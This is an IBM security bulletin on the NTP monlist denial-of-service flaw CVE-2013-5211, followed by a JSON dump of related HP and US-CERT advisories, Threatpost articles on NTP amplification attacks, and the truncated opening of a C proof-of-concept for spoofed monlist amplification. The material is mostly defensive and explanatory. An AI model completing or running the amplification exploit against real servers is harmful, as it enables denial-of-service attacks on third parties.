## Summary
Security vulnerabilities have been discovered in the NTP component of IBM Security Network Intrusion Prevention System.
## Vulnerability Details
**CVEID: **[_CVE-2013-5211 _](<https://vulners.com/cve/CVE-2013-5211>)
**DESCRIPTION: **
NTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a sending specially-crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash.
CVSS Base Score: 5.0
CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/90143/_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/90143>) for the current score
CVSS Environmental Score*: Undefined
CVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)
## Affected Products and Versions
Products: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000
Firmware versions: 4.6.1, 4.6, 4.5, 4.4, and 4.3
## Remediation/Fixes
_The following IBM Threat Fixpacks have the fixes for these vulnerabilities. You could download them from the following links:_
_Product_| _VRMF_| _Remediation/First Fix_
---|---|---
_IBM Security Network Intrusion Prevention System_| _4.6.1.0_| [4.6.1.0-ISS-ProvG-AllModels-Hotfix-FP0011](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.6.0.0_| [4.6.0.0-ISS-ProvG-AllModels-Hotfix-FP0015](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.5.0.0_| [4.5.0.0-ISS-ProvG-AllModels-Hotfix-FP0014](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.4.0.0_| [4.4.0.0-ISS-ProvG-AllModels-System-FP0008](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
_IBM Security Network Intrusion Prevention System_| _4.3.0.0_| [4.3.0.0-ISS-ProvG-AllModels-System-FP0006](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>)
## Workarounds and Mitigations
None
##
{"securityvulns": [{"lastseen": "2018-08-31T11:09:54", "description": "monlist ntp feature is used in-the-wild for traffic amplification.", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "securityvulns", "title": "ntp traffic amplification", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T00:00:00", "id": "SECURITYVULNS:VULN:13525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13525", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04084148\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04084148\r\nVersion: 1\r\n\r\nHPSBUX02960 SSRT101419 rev.1 - HP-UX Running NTP, Remote Denial of Service\r\n(DoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-01-13\r\nLast Updated: 2014-01-13\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), execution of\r\narbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP-UX running\r\nNTP. The vulnerability could be exploited remotely to create a Denial of\r\nService (DoS).\r\n\r\nReferences: CVE-2013-5211 (SSRT101419)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP-UX B.11.31 running NTP version 4.2.6.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2013-5211 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has provided the following workaround to temporarily resolve this\r\nvulnerability. This bulletin will be revised when a General Release patch is\r\navailable.\r\n\r\nMANUAL ACTIONS: Yes\r\n\r\nTo prevent the "monlist" DoS vulnerability, configure the following:\r\n\r\nVerify the NTPv4 version.\r\n\r\nFor example:\r\n/usr/sbin/ntpd --version\r\nntpd 4.2.6p5\r\nntpd 4.2.6 Revision 0.0 Tue Nov 5 14:21:22 UTC 2012\r\n\r\nModify the ntp.conf on your time server and add the following.\r\n\r\n# Block all control queries from external systems, allows time services\r\n\r\nrestrict default noquery\r\n\r\n# Allow local queries\r\n\r\nrestrict 127.0.0.1\r\n\r\nCycle the ntpd daemon.\r\n\r\n/sbin/init.d/ntpd stop\r\n/sbin/init.d/ntpd start\r\n\r\nVerification of the workaround.\r\n\r\nTest on the local time server using the "ntpq -p" command.\r\nVerify proper operation with output similar to:\r\nremote refid st t when poll reach delay offset disp\r\n======================================\r\n*LOCAL(1) .LOCL. 6 l 13 16 377 0.000 0.000 0.233\r\n\r\nOn a remote time client, execute ntpdc or xntpdc as follows\r\n# ntpdc -c monlist server.name.with.restrict\r\nA timeout error should occur.\r\n# xntpdc -c monlist xyz.hp.com\r\nxyz.hp.com: timed out, nothing received\r\n***Request timed out\r\n#\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 January 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlLUOUEACgkQ4B86/C0qfVkmlQCg8mFeTO+UynzsMEZmrKCjqTSc\r\nlJwAn31N8anDuC33OqqUw7J4zuTqzImk\r\n=LUiS\r\n-----END PGP SIGNATURE-----\r\n\r\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "securityvulns", "title": "[security bulletin] HPSBUX02960 SSRT101419 rev.1 - HP-UX Running NTP, Remote Denial of Service (DoS)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T00:00:00", "id": "SECURITYVULNS:DOC:30241", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30241", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:50", "description": "\r\n\r\nNCCIC / US-CERT\r\n\r\nNational Cyber Awareness System:\r\nTA14-013A: NTP Amplification Attacks Using CVE-2013-5211\r\n01/13/2014 05:51 PM EST\r\n\r\nOriginal release date: January 13, 2014 | Last revised: January 14, 2014\r\nSystems Affected\r\n\r\nNTP servers\r\nOverview\r\n\r\nA Network Time Protocol (NTP) Amplification attack is an emerging form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible NTP servers to overwhelm a victim system with UDP traffic.\r\nDescription\r\n\r\nThe NTP service supports a monitoring service that allows administrators to query the server for traffic counts of connected clients. This information is provided via the \u201cmonlist\u201d command. The basic attack technique consists of an attacker sending a "get monlist" request to a vulnerable NTP server, with the source address spoofed to be the victim\u2019s address.\r\nImpact\r\n\r\nThe attack relies on the exploitation of the 'monlist' feature of NTP, as described in CVE-2013-5211, which is enabled by default on older NTP-capable devices. This command causes a list of the last 600 IP addresses which connected to the NTP server to be sent to the victim. Due to the spoofed source address, when the NTP server sends the response it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks. The solution is to disable \u201cmonlist\u201d within the NTP server or to upgrade to the latest version of NTP (4.2.7) which disables the \u201cmonlist\u201d functionality.\r\nSolution\r\n\r\nDetection\r\n\r\nOn a UNIX-platform, the command \u201cntpdc\u201d will query existing NTP servers for monitoring data. If the system is vulnerable to exploitation, it will respond to the \u201cmonlist\u201d command in interactive mode. By default, most modern UNIX and Linux distributions allow this command to be used from localhost, but not from a remote host. To test for monlist support, execute the following command at the command line:\r\n\r\n/usr/sbin/ntpdc <remote server>\r\n\r\nmonlist\r\n\r\nAdditionally, the \u201cntp-monlist\u201d script is available for NMap, which will automatically display the results of the monlist command. If the system does not support the monitor query, and is therefore not vulnerable to this attack type, NMap will return an error type 4 (No Data Available) or no reply at all.\r\n\r\n \r\n\r\nRecommended Course of Action\r\n\r\nAs all versions of ntpd prior to 4.2.7 are vulnerable by default, the simplest recommended course of action is to upgrade all versions of ntpd that are publically accessible to at least 4.2.7. However, in cases where it is not possible to upgrade the version of the service, it is possible to disable the monitor functionality in earlier versions of the software.\r\n\r\nTo disable \u201cmonlist\u201d functionality on a public-facing NTP server that cannot be updated to 4.2.7, add the \u201cnoquery\u201d directive to the \u201crestrict default\u201d line in the system\u2019s ntp.conf, as shown below:\r\n\r\nrestrict default kod nomodify notrap nopeer noquery\r\n\r\nrestrict -6 default kod nomodify notrap nopeer noquery\r\nReferences\r\n\r\n Vulnerability Summary for CVE-2013-5211\r\n NTP Software Downloads\r\n ntp-monlist NSE Script\r\n\r\nRevision History\r\n\r\n January 13, 2014 - Initial Release\r\n\r\nThis product is provided subject to this Notification and this Privacy & Use policy.\r\nOTHER RESOURCES:\r\nContact Us | Security Publications | Alerts and Tips | Related Resources\r\nSTAY CONNECTED:\r\nSign up for email updates\r\n\r\nSUBSCRIBER SERVICES:\r\nManage Preferences | Unsubscribe | Help\r\nThis email was sent to 3apa3a@security.nnov.ru using GovDelivery, on behalf of: United States Computer Emergency Readiness Team (US-CERT) \u00b7 245 Murray Lane SW Bldg 410 \u00b7 Washington, DC 20598 \u00b7 (703) 235-5110 \tPowered by GovDelivery\r\n", "cvss3": {}, "published": "2014-01-14T00:00:00", "type": "securityvulns", "title": "TA14-013A: NTP Amplification Attacks Using CVE-2013-5211", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T00:00:00", "id": "SECURITYVULNS:DOC:30240", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30240", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:57", "description": "No security arena is better representative of the cat and mouse game between hackers and defenders than DDoS attacks and prevention/mitigation.\n\nEnterprises and service providers have invested heavily in DDoS mitigations in order to keep critical services available. That\u2019s forced hackers to crank up the volume on attacks, and they\u2019re getting louder by the minute.\n\nFirst-quarter numbers from Arbor Networks illustrate the point that [volumetric attacks](<http://www.slideshare.net/Arbor_Networks/q1-2014-ddos-attack-stats-from-atlas>), where hackers leverage open DNS resolvers and open NTP servers to launch massive attacks, are already exceeding 2013 totals. Attacks of more than 20 Gbps in Q1 have already toppled all of last year\u2019s similar attacks by 1\u00bd times; 72 incidents of more than 100 Gbps were tracked with the peak attack at 325 Gbps.\n\nThe primary means by which hackers are amplifying attacks is through the abuse of a known weakness in a core Internet service known as Network Time Protocol, or NTP. Arbor said that its data shows that 85 percent of DDoS attacks of more than 100 Gbps are NTP reflection attacks; the largest attack came in February when CloudFlare reported a massive attack against one of its customers topping out at [400 Gbps](<http://threatpost.com/ntp-amplification-blamed-for-400-gbps-ddos-attack/104201>), dwarfing the [300 Gbps attack against Spamhaus](<http://threatpost.com/spamhaus-ddos-attacks-triple-size-attacks-us-banks-032713/77675>) last year that relied on DNS amplification instead.\n\nOn a technical level, [NTP amplification attacks](<threatpost.com/us-cert-warns-of-ntp-amplification-attacks/103573>) are slightly simpler to pull off because attackers require fewer servers and get a greater return for their abuse.\n\n\u201cThe reason has to do with the amplification factor,\u201d said Arbor solutions architect Gary Sockrider. \u201cWith NTP reflection attacks, you get 1000 times the amplification; 1000 times the size of the query is reflected back. There\u2019s more cause for alarm with NTP attacks because attackers get a better response rate.\u201d\n\nUS-CERT issued an [advisory](<http://www.us-cert.gov/ncas/alerts/TA14-013A>) in January warning companies that hackers were exploiting NTP vulnerabilities to flood networks with UDP traffic. NTP servers are publicly available machines used to synchronize computer clocks. With NTP amplification attacks, hackers exploit the MON_GETLIST feature in NTP servers, which returns the IP address of the last 600 machines interacting with an NTP server. Monlists are a classic set-and-forget feature and are vulnerable to hackers making [forged REQ_MON_GETLIST requests](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211>) enabling traffic amplification.\n\nAttackers are able to query NTP servers for traffic counts using the victim\u2019s spoofed source address.\n\nAttackers are able to query NTP servers for traffic counts using the victim\u2019s spoofed source address. In return, the response is much larger than the original request, and with enough vulnerable NTP servers returning requests, a website and/or services are quickly overrun with traffic.\n\nWhile the possibility exists, Sockrider said, for terabyte-per-second attacks, network and service provider managers have done a better job patching the wonky code in NTP servers than, say, open DNS resolvers. According to the [Open Resolver Project](<http://openresolverproject.org/>), an initiative that tracks open DNS resolvers, more than 28 million were active on the Internet as of last October.\n\n\u201cThe infrastructure is out there; abuseable servers are out there,\u201d Sockrider said. \u201cIt\u2019s been bad, but it could be worse. The Internet community at large has done a good job locking down NTP, more so than DNS.\u201d\n\nWhile some of these volumetric attacks are targeted against particular enterprises for any number of financial or ideological motivations, the effects are felt beyond the corporate network.\n\n\u201cWhen it comes to these volumetric attacks, it\u2019s not about taking down a server, it\u2019s about taking down an infrastructure,\u201d Sockrider said. \u201cService providers (ISPs, data center, cloud companies, web hosts) have been dealing with volumetric attacks for some time. Because of that, they\u2019ve put in a lot of infrastructure and mitigation capabilities to deal with these attacks.\u201d\n\nAttackers understand that service providers can likely mitigate a 100 Gbps attack for a client, so traffic levels are ramped up, forcing more infrastructure and more spending on mitigations.\n\n\u201cNTP attacks are going to be felt upstream because they are so large. That\u2019s where traffic has to be dealt with,\u201d Sockrider said. \u201cFor a example, a service running in a data center has 10 gig links to the Internet; upstream there is a service provider with 100 gig pipes and upstream from them there are lots of 100 gig links. A 400 Gbps attack overwhelms even upstream of the data center with Tier 2 and Tier 3 service providers. It has to be dealt with upstream of those with a Tier 1 provider with circuits big enough to deal with attack.\u201d\n\nThe recent Verizon Data Breach Investigations Report also covered DDoS attacks, pointing out that cybercriminals are using [botnets to overwhelm networks with traffic,](<http://threatpost.com/dbir-point-of-sale-breaches-trending-downward/105598>) possibly as a [cover for intellecural property theft or financial fraud](<http://threatpost.com/ddos-attacks-an-increasing-cover-for-theft-fraud/105681>), something that was also covered recently by Incapsula.\n\n\u201cWe\u2019re seeing a growing trend of combining DDoS with APT campaigns,\u201d Sockrider said. \u201cGo back a few years, and DDOs was thought of more as a takedown mechanism, not for data exfiltration. Now we\u2019re seeing it more frequently combined with APT, prolonged campaigns where an attacker is on your network and now need to get the data out, they\u2019ll initiate a DDoS attack. It\u2019s the equivalent of a natural disaster and while you\u2019re dealing with it, that\u2019s when they\u2019ll exfiltrate data.\u201d\n", "cvss3": {}, "published": "2014-04-29T13:03:29", "type": "threatpost", "title": "Volume of NTP Amplification Attacks Getting Louder", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-05-02T13:39:01", "id": "THREATPOST:F634BC41D4087F499E1A4ABFBDBA7954", "href": "https://threatpost.com/volume-of-ntp-amplification-attacks-getting-louder/105763/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:58:52", "description": "PointDNS says most of its DNS servers are online again after a massive DDoS attack late last week took down the service provider.\n\nA post on the company\u2019s Twitter account on Friday said the [provider was adding nameservers](<https://twitter.com/pointdns/status/464761954247397377>) and working with network providers to restore service to its customers. Many of those same customers took to social media complaining about downtime and unavailability of their own websites and services. According to its website, PointDNS services more than 220,000 domains worldwide.\n\nEarlier today, a post from parent company Copper.io said services were \u201cback to normal.\u201d\n\nThis was the second large attack against a DNS provider in the last two weeks. On April 30, [UltraDNA mitigated a DDoS attack](<http://threatpost.com/ultradns-dealing-with-ddos-attack/105806>) that kept most of its customers offline for the better part of a day.\n\nThe SANS Institute\u2019s Internet Storm Center said the attack peaked at 100 Gbps against one of UltraDNS\u2019 customers. The attack resulted in latency issues for other UltraDNS customers.\n\nLast week, Incapsula, a cloud-based application delivery company that also sells security services, said it fought back a 25 million packets per second DDoS attack and that many of the DNS queries held non-spoofed IP data. This stands in contrast to many other massive DDoS attacks of late, in particular reflection or amplification attacks, that rely on spoofed addresses to send massive quantities of bad traffic at a target.\n\nThe Incapsula-mitigated attack was traced back to IP addresses belonging to a pair of DDoS protection services, which are designed for high-capacity traffic management, Incapsula said. Hackers can take advantage of this to pull off DDoS attacks without amplification.\n\nThese latest attacks, meanwhile, continue a trend of volumetric DDoS attacks reaching new heights.\n\nA recent report from Arbor Networks said the provider has already tracked more than 70 DDoS attacks that topped 100 Gbps or more of malicious traffic. The largest on record reached between 325 Gbps and 400 Gbps of traffic.\n\nAlmost all of these attacks rely on DNS reflection or a growing number on [network time protocol amplification attacks](<http://threatpost.com/volume-of-ntp-amplification-attacks-getting-louder/105763>). In both cases, IP addresses are spoofed as the target, and massive amounts of traffic is sent their way at no cost to the attacker.\n\nUS-CERT issued an [advisory](<http://www.us-cert.gov/ncas/alerts/TA14-013A>) in January warning companies that hackers were exploiting NTP vulnerabilities to flood networks with UDP traffic. NTP servers are publicly available machines used to synchronize computer clocks. With NTP amplification attacks, hackers exploit the MON_GETLIST feature in NTP servers, which returns the IP address of the last 600 machines interacting with an NTP server. Monlists are a classic set-and-forget feature and are vulnerable to hackers making [forged REQ_MON_GETLIST requests](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211>) enabling traffic amplification.\n\nWith DNS amplification attacks, attackers take advantage of any number of the 28 million open DNS resolvers on the Internet to launch large-scale DDoS attacks. The motivations are varied. Ideological hackers use them to take down services in protest, while profit-motivated criminals can use DDoS as a cover for intellectual property theft and financial fraud.\n", "cvss3": {}, "published": "2014-05-12T15:35:26", "type": "threatpost", "title": "PointDNS Recovers from Massive DDoS Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-05-13T20:16:11", "id": "THREATPOST:2F7D66A50AA47B193A3ECF50378FF25B", "href": "https://threatpost.com/another-dns-provider-targeted-in-ddos-attack/106045/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "For those of you who thought the infamous Spamhaus distributed denial-of-service attack set an ugly bar for the volume of spurious traffic sent at a target, gird yourself for worse.\n\nA massive DDoS attack, reaching at its peak 400 Gbps of bad traffic, was detected late yesterday against a number of servers in Europe, according to traffic optimization firm CloudFlare. CEO Matthew Prince tweeted several times with scant details about the attack against an unnamed customer.\n\n\u201cSomeone\u2019s got a big new cannon,\u201d Prince said. \u201cStart of ugly things to come.\u201d\n\nThe peak of the attack surpassed the [Spamhaus DDoS attacks](<http://threatpost.com/spamhaus-ddos-attacks-triple-size-attacks-us-banks-032713/77675>) of last March, which topped out at 300 Gbps, which at the time were three times the size of DDoS attacks carried out against leading U.S. banks and financial services institutions.\n\nThe attackers took advantage of weaknesses in a core piece of Internet infrastructure known [as Network Time Protocol (NTP) to amplify the volume of attacks](<http://threatpost.com/us-cert-warns-of-ntp-amplification-attacks/103573>).\n\nUS-CERT issued an [advisory](<http://www.us-cert.gov/ncas/alerts/TA14-013A>) in January warning companies that hackers were exploiting NTP vulnerabilities to flood networks with UDP traffic. NTP servers are publicly available machines used to synchronize computer clocks.\n\nKnown as NTP amplification attacks, hackers are exploiting something known as the monlist feature in NTP servers, also known as MON_GETLIST, which returns the IP address of the last 600 machines interacting with an NTP server. Monlists are a classic set-and-forget feature and is vulnerable to hackers making [forged REQ_MON_GETLIST requests](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211>) enabling traffic amplification.\n\nAttackers are able to query NTP servers for traffic counts using the victim\u2019s spoofed source address. In return, the response is much larger than the original request, and with enough vulnerable NTP servers returning requests, a website and/or services are quickly overrun with traffic.\n\n\u201cBecause the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks,\u201d US-CERT said in its January advisory where it also advised that webhosts either disable the monlist feature, or upgrade their NTP servers to version 4.2.7 which disables the feature.\n\nThese types of high-volume attacks, whether related to NTP or open DNS resolvers, have impacted numerous industries from gaming to manufacturing to financial services. Experts say enterprises are deploying better defenses to shield themselves and critical services from DDoS attacks, which could be one reason for the volume increase. Another could be that attackers are going overboard with hundreds of Gbps to distract from their real goal which could be financial fraud or intellectual property theft.\n\nArbor Networks\u2019 most recent [Worldwide Infrastructure Security Report](<http://www.arbornetworks.com/resources/infrastructure-security-report>) indicates far more of these [volumetric attacks](<http://threatpost.com/high-volume-ddos-attacks-top-operational-threat-to-businesses-service-providers/103933>) were reported than in past years, but they are still outliers. Yet successful temporary takedowns of large banks and high-profile organizations such as Spamhaus and others prove to the underground that techniques such as NTP amplification attacks and the use of open DNS resolvers have merit.\n\n\u201cSpamhaus made people aware of the threat of reflection amplification attacks. It does appear attackers have learned to leverage the infrastructure available on the Internet to help them in attacks,\u201d Arbor Networks\u2019 Darren Anstee said.\n\nArbor\u2019s report also said that few companies have security staff dedicated to infrastructure such as DNS and locking down those and related services. Coupled with the availability of open DNS resolvers, that presents a problem for high-value targets.\n\n\u201cIf you\u2019ve got open DNS resolvers you can use and if you\u2019ve got a botnet that can generate a good volume of traffic and point it at a list of open DNS resolvers, you can use those resolvers to amplify the capabilities you have for your botnet,\u201d Anstee said, adding that attackers can get a 30x improvement with amplification in some cases. \u201cUnfortunately, it\u2019s not that hard; the know-how is available.\u201d\n", "cvss3": {}, "published": "2014-02-11T12:21:35", "type": "threatpost", "title": "NTP Amplification Blamed for 400 Gbps DDoS Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-02-13T22:01:11", "id": "THREATPOST:114455ACCB1F1402377145711A226E94", "href": "https://threatpost.com/ntp-amplification-blamed-for-400-gbps-ddos-attack/104201/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-06T22:59:32", "description": "US-CERT has issued an [advisory](<http://www.us-cert.gov/ncas/alerts/TA14-013A>) that warns enterprises about distributed denial of service attacks flooding networks with massive amounts of UDP traffic using publicly available network time protocol (NTP) servers.\n\nKnown as NTP amplification attacks, hackers are exploiting something known as the monlist feature in NTP servers, also known as MON_GETLIST, which returns the IP address of the last 600 machines interacting with an NTP server. Monlists is a classic set-and-forget feature and is used generally to sync clocks between servers and computers. The protocol is vulnerable to hackers making [forged REQ_MON_GETLIST requests](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5211>) enabling traffic amplification.\n\n\u201cThis response is much bigger than the request sent making it ideal for an amplification attack,\u201d said John Graham-Cumming of Cloudflare.\n\nAccording to US-CERT, the MON_GETLIST command allows admins to query NTP servers for traffic counts. Attackers are sending this command to vulnerable NTP servers with the source address spoofed as the victim.\n\n\u201cDue to the spoofed source address, when the NTP server sends the response it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim,\u201d the US-CERT advisory says. \u201cAdditionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks.\u201d\n\nTo mitigate these attacks, US-CERT advises disabling the monlist or upgrade to NTP version 4.2.7, which also disables monlist.\n\nNTP amplification attacks have been blamed for recent DDoS attacks against popular online games such as League of Legends, Battle.net and others. [Ars Technica](<http://arstechnica.com/security/2014/01/new-dos-attacks-taking-down-game-sites-deliver-crippling-100-gbps-floods/>) today reported that the gaming servers were hit with up to 100 Gbps of UDP traffic. Similar traffic amounts were used to take down American banks and financial institutions last year in allegedly politically motivated attacks.\n\n\u201cUnfortunately, the simple UDP-based NTP protocol is prone to amplification attacks because it will reply to a packet with a spoofed source IP address and because at least one of its built-in commands will send a long reply to a short request,\u201d Graham-Cumming said. \u201cThat makes it ideal as a DDoS tool.\u201d\n\nGraham-Cumming added that an attacker who retrieves a list of open NTP servers, which can be located online using available Metasploit or Nmap modules that will find NTP servers that support monlist.\n\nGraham-Cumming demonstrated an example of the type of amplification possible in such an attack. He used the MON_GETLIST command on a NTP server, sending a request packet 234 bytes long. He said the response was split across 10 packets and was 4,460 bytes long.\n\n\u201cThat\u2019s an amplification factor of 19x and because the response is sent in many packets an attack using this would consume a large amount of bandwidth and have a high packet rate,\u201d Graham-Cumming said.\n\n\u201cThis particular NTP server only had 55 addresses to tell me about. Each response packet contains 6 addresses (with one short packet at the end), so a busy server that responded with the maximum 600 addresses would send 100 packets for a total of over 48k in response to just 234 bytes. That\u2019s an amplification factor of 206x!\u201d\n", "cvss3": {}, "published": "2014-01-14T12:45:33", "type": "threatpost", "title": "NTP Amplification Flaw To Blame For Gaming DDoS Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-01-14T17:45:33", "id": "THREATPOST:EEA93C6F0B39B4E3C16424AC3BB047C3", "href": "https://threatpost.com/us-cert-warns-of-ntp-amplification-attacks/103573/", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-19T07:10:46", "description": "Exploit for linux platform in category dos / poc", "cvss3": {}, "published": "2014-04-29T00:00:00", "type": "zdt", "title": "NTP ntpd monlist Query Reflection - Denial of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-5211"], "modified": "2014-04-29T00:00:00", "id": "1337DAY-ID-22197", "href": "https://0day.today/exploit/description/22197", "sourceData": "/*\r\n * Exploit Title: CVE-2013-5211 PoC - NTP DDoS amplification\r\n * Date: 28/04/2014\r\n * Code Author: Danilo PC - <[email\u00a0protected]>\r\n * CVE : CVE-2013-5211\r\n*/\r\n \r\n/* I coded this program to help other to understand how an DDoS attack amplified by NTP servers works (CVE-2013-5211)\r\n * I took of the code that generates a DDoS, so this code only sends 1 packet. Why? Well...there's a lot of kiddies out there,\r\n * if you know how to program, making a loop or using with other tool is piece of cake. There core idea is there, just use it as you please.\r\n */\r\n \r\n//------------------------------------------------------------------------------------------------//\r\n//------------------------------------------------------------------------------------------------//\r\n \r\n \r\n#include <stdio.h> //For on printf function\r\n#include <string.h> //For memset\r\n#include <sys/socket.h> //Structs and Functions used for sockets operations.\r\n#include <stdlib.h> //For exit function\r\n#include <netinet/ip.h> //Structs for IP header\r\n \r\n//Struct for UDP Packet\r\nstruct udpheader{\r\n unsigned short int udp_sourcePortNumber;\r\n unsigned short int udp_destinationPortNumber;\r\n unsigned short int udp_length;\r\n unsigned short int udp_checksum;\r\n};\r\n \r\n// Struct for NTP Request packet. Same as req_pkt from ntpdc.h, just a little simpler\r\nstruct ntpreqheader {\r\n unsigned char rm_vn_mode; /* response, more, version, mode */\r\n unsigned char 